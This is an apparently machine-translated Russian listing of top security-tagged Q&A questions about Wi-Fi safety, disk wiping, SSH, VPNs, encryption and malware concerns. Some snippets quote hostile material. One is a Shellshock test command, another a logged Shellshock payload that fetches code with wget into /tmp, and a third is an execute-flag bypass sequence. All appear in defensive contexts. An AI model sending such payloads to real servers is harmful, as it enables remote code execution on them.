Вопросы с меткой [security]
Защита компьютерных систем и информации от таких угроз, как кража или уничтожение данных.
4365 вопросов
28
голосов
4ответа
4k показов
Какова ответственность владельца IPv6?
Живя за маршрутизатором потребительского уровня для незабываемого прошлого, я полагаю, что я воспринял побочный эффект NAT как должное в том, что у меня было бремя перенаправления портов, когда мне ...
28
голосов
4ответа
6k показов
Зачем стирать файл со случайными шаблонами вместо всех 0 или 1?
Компьютерные файлы на самом деле не удаляются, когда они удаляются в Windows. Указатель адреса просто освобождается, а это пространство освобождается для перезаписи позже. Для получения ...
27
голосов
17ответов
13k показов
Как я могу физически уничтожить данные с неисправного жесткого диска?
У меня сломан жесткий диск, который содержит конфиденциальные данные. Поскольку никакое программное обеспечение не может получить доступ к диску, я не могу стереть его, используя любой из ...
27
голосов
5ответов
13k показов
Может ли вредоносный веб-сайт получить доступ к содержимому файлов на компьютере?
Это может быть параноиком, но если я захожу на вредоносный веб-сайт, могут ли они сказать, что находится внутри PDF на моем рабочем столе или что находится внутри моих изображений на моем жестком ...
26
голосов
7ответов
2k показов
Как я могу защитить себя при использовании общественных точек доступа Wi-Fi?
Мне часто требуется доступ к защищенным ресурсам (gmail, банковские услуги, удаленный рабочий стол и т.д.), Когда они находятся в общественных точках доступа Wi-Fi. Что я могу сделать, чтобы никто не ...
26
голосов
5ответов
46k показов
Как хакер в публичном WIFI на самом деле видит ваш компьютер?
Я читал, что они могут видеть, какие сайты вы просматриваете или даже получаете доступ к вашему компьютеру, если вы подключены к тому же WIFI-соединению, но как именно?
25
голосов
5ответов
35k показов
Может ли свет в нижней части оптической мыши повредить ваши глаза?
Потому что я использую его в качестве украшения для елки, и люди смотрят прямо в него каждый день.
25
голосов
3ответа
11k показов
Можно ли хранить произвольные данные в файле изображения?
Можно ли хранить произвольные данные, например документы или программу, в виде файла изображения, например изображения PNG? Меня беспокоит то, что кто-то может кодировать данные для использования ...
25
голосов
9ответов
3k показов
Почему мне плохо, если мой компьютер заражен, если я не замечаю?
Ситуация, с которой я сталкиваюсь, является членом семьи, положение которого следующее: Я не хочу обновлять то, что работает, обновления могут что-то сломать. Посмотрите на наш старый компьютер, ...
25
голосов
4ответа
2k показов
Почему в Linux можно сменить пароль администратора?
Несколько дней назад мой друг хотел показать мне, что он может использовать мой linux, даже если я не сообщу ему свой пароль. Зашел в GRUB, выбрал опцию режима восстановления. Моя первая проблема - ...
25
голосов
6ответов
22k показов
Как безопасно удалить файлы, хранящиеся на SSD?
Из (очень длинной, но, безусловно, стоит прочитать) статьи о твердотельных накопителях: Когда вы удаляете файл в вашей ОС, реакция на жестком диске или SSD отсутствует. Только когда вы перезаписаете ...
25
голосов
4ответа
14k показов
Зашифрованный WiFi без пароля?
Существует ли какой-либо стандарт, который позволяет шифровать соединение WiFi, но не требует пароля? Я знаю, что (старый, слабый) WEP и более новый WPA/WPA2 требуют пароль (т.е. общий секрет). Между ...
24
голоса
4ответа
89k показов
Может кто-нибудь объяснить «PasswordAuthentication» в файле /etc /ssh /sshd_config?
На этой странице дано объяснение: Опция PasswordAuthentication указывает, следует ли использовать аутентификацию на основе пароля. Для обеспечения безопасности этот параметр всегда должен быть ...
24
голоса
2ответа
18k показов
Действительно ли шифрование zip действительно плохо?
В течение многих лет стандартным советом в отношении сжатия и шифрования было то, что сила шифрования zip плохая. Это действительно так в наши дни? Я читал эту статью о WinZip (у него такая же плохая ...
24
голоса
3ответа
4k показов
Как обеспечивается уникальность MAC-адресов?
Снова и снова я читаю, что устройства однозначно идентифицируются по их MAC-адресам. Но как определяются MAC-адреса? (И они говорят нам что-нибудь об устройстве, которое они представляют?)
24
голоса
7ответов
38k показов
Как исправить уязвимость безопасности Shellshock в тестировании Debian / Jessie?
Тестовая команда x='() { :;}; echo vulnerable' bash показывает, что моя установка Debian 8 (Jessie) уязвима даже с последними обновлениями. Исследования показывают, что есть патч для стабильной и ...
24
голоса
5ответов
5k показов
Насколько рискованно иметь персональный сервер с ssh, открытый в Интернет?
Продолжение названия будет «при ограниченных знаниях в области безопасности Интернета». Недавно я установил небольшой сервер с компьютером низкого уровня, на котором запущен Debian, с целью ...
23
голоса
10ответов
6k показов
Безопасно ли хранить полусекретную информацию в Dropbox?
Я не доверял бы Dropbox с моими банковскими реквизитами и тому подобным (потому что многие люди ищут такую информацию), но безопасно ли хранить вещи, которые могут быть полезны для небольшого числа ...
23
голоса
5ответов
34k показов
Сколько информации может видеть мой провайдер?
Может ли мой провайдер видеть пароли, которые я ввожу на веб-сайтах и в программах чата? А как насчет веб-сайтов SSL, которые начинаются с https, они шифруют мое имя пользователя и пароль перед тем, ...
23
голоса
3ответа
3k показов
Подрыв флага выполнения в системах Linux. Почему это возможно?
Читая это, я обнаружил следующий эксплойт: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % ...
23
голоса
3ответа
3k показов
Я параноик, или корпоративные брандмауэры цензурируют целые страны?
Недавно, в последний год или около того, я заметил, что все более и более трудным становится доступ к определенным типам сайтов, особенно в таких непривилегированных странах, как Иран или Россия. ...
23
голоса
4ответа
2k показов
Какие функции я бы потерял, если бы отключил браузерную Java?
Я читаю, что отключение Java, а не JavaScript, сделает мой компьютер более безопасным от атак вредоносных программ. Все указывает на то, что это действительно сделает его более безопасным, но нет ...
23
голоса
3ответа
5k показов
Это атака или что-то, о чем нужно беспокоиться? Shellshock?
Увидел это в access.log на моем тестовом сервере: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > ...
23
голоса
5ответов
10k показов
Как отключить CSP в Firefox только для букмарклетов?
Сегодня я заметил, что не могу запускать букмарклеты на https://github.com/ из-за ограничений Content Security Policy (CSP). Есть ли способ отключить CSP в Firefox только для букмарклетов, а не для ...
23
голоса
7ответов
15k показов
Существует ли HTTPS Everywhere для Chrome, MSIE или Safari?
Мне действительно нравится это дополнение HTTPS Everywhere для Firefox. Но я склонен к переходу в браузер, поэтому были ли выпущены аналогичные HTTPS-предпочтительные дополнения для других основных ...
22
голоса
4ответа
62k показов
Как проверить, установлено ли конкретное обновление для системы безопасности Windows?
Учитывая, что эксплойт WannaCry Ransomware работает, я хотел проверить, есть ли на моем компьютере специальное обновление для системы безопасности, которое должно устранить уязвимость - по-видимому, ...
22
голоса
3ответа
25k показов
Сохранены ли сохраненные учетные данные удаленного рабочего стола на локальном компьютере?
Сохранены ли сохраненные учетные данные удаленного рабочего стола (условно говоря) на локальном компьютере? По крайней мере, они нигде не хранятся в виде открытого текста? Изменить: я понимаю ...
21
голос
2ответа
37k показов
В Windows 10 как вы гарантируете, что весь трафик проходит через VPN?
Какой самый простой способ гарантировать, что весь трафик проходит через VPN в Windows 10? Есть ли какие-то встроенные способы? Я в основном ищу интернет-переключатель в случае сбоя VPN. Я ...
21
голос
5ответов
14k показов
Безопасен ли трафик https через незашифрованную беспроводную сеть?
Это то, что я задавался вопросом в течение длительного времени. Если, скажем, я использую Gmail через https, может ли кто-нибудь прочитать мои чаты и электронные письма, если я использую незащищенную ...
21
голос
6ответов
3k показов
Защита паролем папки
Какие есть варианты защиты паролем папки? Я говорю о том, что для доступа к папке требуется пароль, а не только права доступа пользователя. Является ли стороннее программное обеспечение безопасным и ...
20
голосов
6ответов
22k показов
Протрите оперативную память при выключении, чтобы предотвратить холодную загрузку
Моя система зашифрована с использованием Full Disk Encryption, т.е. все, кроме /boot, зашифровано с помощью dmcrypt /luks. Меня беспокоят « холодные» атаки, где исследователи продемонстрировали, что ...
20
голосов
3ответа
97k показов
Каков современный дневной эквивалент Firesheep?
Firesheep вышел на сцену в 2010 году и потряс мир ... и так и не вышел на версию 1.0. С тех пор Mozilla выпустила 15 основных версий Firefox и несовместима с расширением. Есть ли версия, которая ...
20
голосов
3ответа
42k показов
В чем разница между прокси и VPN?
Существует несколько поставщиков услуг, которые позволяют пользователю обходить межсетевые экраны или анонимно использовать свой веб-доступ. Некоторые из них используют прокси, некоторые используют ...
20
голосов
2ответа
4k показов
Зачем мне запускать команды от имени администратора, если моя учетная запись является членом группы администраторов?
Если моя учетная запись уже является членом группы администраторов, почему некоторые функции Windows 7 требуют, чтобы я запускал их от имени администратора? Я вроде думал, что подразумевалось?
20
голосов
6ответов
2k показов
Стоит ли беспокоиться о вредоносном ПО в Linux?
Я не запускаю антивирус в Linux (большинство людей не знают AFAIK), и меня совсем не беспокоит какая-либо вредоносная, шпионская или любая другая программа. Должен ли я быть обеспокоен? Конечно, я не ...
20
голосов
5ответов
98k показов
Несколько экземпляров conhost.exe
Мой рабочий стол постоянно работает в фоновом режиме с двумя экземплярами conhost.exe . Некоторый гугл поднял несколько статей, таких как эта, но они не объясняют, почему у меня работает несколько ...
20
голосов
2ответа
18k показов
детальная конфигурация sudoers (допустимые аргументы командной строки)
Есть ли прямой способ, чтобы позволить пользователю работать (например) /usr/bin/pacman -S -u как корень, не позволяя ему бежать /usr/bin/pacman -S -u some_package ? Линия user ALL=(root) NOPASSWD: ...
20
голосов
5ответов
78k показов
Должен ли я запустить свой маленький веб-сайт в порт 80, 8080 или 81?
Я работаю на небольшом веб-сайте, используя nginx. Поскольку (вероятно) не будет много трафика в течение срока службы моего сервера и чтобы избежать случайных DoS-атак, я подумываю настроить ...
20
голосов
2ответа
35k показов
Где хранится мой сертификат сервера RDP?
Учитывая недавние проблемы атак типа «человек посередине», я фактически обратил внимание на предупреждение, которое я получаю при подключении к серверу: Выбрав View Certificate, я собирался проверить ...
20
голосов
3ответа
33k показов
Windows 7 эквивалент для ntrights.exe
Что является эквивалентом ntrights.exe в Windows 7? Мне нужно, чтобы его можно было запустить из командной строки.
20
голосов
4ответа
3k показов
Как можно запретить запись или чтение файлов с символом Юникод справа налево в их имени (метод подмены вредоносного ПО)?
Как можно предотвратить или запретить запись или чтение файлов на ПК под управлением Windows с символом Unicode RLO (переопределение справа налево) в их имени (вредоносный метод подделки имен ...
20
голосов
16ответов
6k показов
Менеджер паролей для нескольких компьютеров?
Есть ли менеджер паролей, который я могу использовать на нескольких компьютерах, чтобы запомнить все пароли, которые я использую на сайтах, которые я посещаю?
19
голосов
3ответа
59k показов
Опасны ли внутренние части ЖК-мониторов?
У меня есть треснутый ЖК-монитор. Пока ничего не просачивается, но если что-то начинает просачиваться, следует ли мне беспокоиться? Я искал и прочитал все от: Безопасно быть рядом и справляться, ...
19
голосов
2ответа
5k показов
Насколько велик риск для популярных расширений Chrome?
Я собираюсь перейти на Chromium, и я установил несколько расширений. Каждый раз, когда я устанавливал расширение, меня уведомляли о том, к каким данным у него есть доступ, например: Я понимаю, что ...
19
голосов
1ответ
10k показов
Чем S/MIME отличается от PGP/GPG для подписи и / или шифрования электронной почты?
Помимо основного вопроса, совместимы ли две технологии? Если да, то при каких обстоятельствах? Каковы относительные преимущества двух технологий?
19
голосов
3ответа
30k показов
Насколько безопасен SSH-туннель или соединение?
Я часто советовал людям использовать SSH-туннель для обеспечения безопасности их просмотра в открытых WIFI или в других небезопасных ситуациях. Недавно мой друг спросил, насколько безопасен туннель ...
19
голосов
2ответа
41k показов
TrueCrypt, RIPEMD-160 против SHA-512 против водоворота
Я шифрую том с помощью TrueCrypt. Я решил использовать AES в качестве алгоритма шифрования, так как это государственный стандарт. Но какой алгоритм хеширования лучше (более безопасный)? RIPEMD-160 ...
19
голосов
9ответов
3k показов
Насколько безопасна блокировка экрана?
Таким образом, и Windows, и Linux имеют довольно полезную функцию, которая позволяет вам оставлять все запущенным на ПК, а также защищать захватчиков от блокировки экрана. Мой вопрос: Скажем, я ...
19
голосов
10ответов
136k показов
Есть ли способ защитить паролем папку Dropbox на моем рабочем компьютере?
Я часто использую Dropbox, и я хотел бы начать использовать свою учетную запись Dropbox на своем рабочем ПК, однако я хочу запретить кому-либо еще иметь доступ к файлам в папке моего Dropbox, кроме ...
19
голосов
2ответа
967 показов
Каковы последствия безопасности при вводе пароля в поле имени пользователя?
Допустим, я набрал свой пароль в текстовом поле имени пользователя на часто посещаемом веб-сайте (конечно, https) и нажал клавишу ввода, прежде чем заметил, что я делаю. Мой пароль сейчас находится ...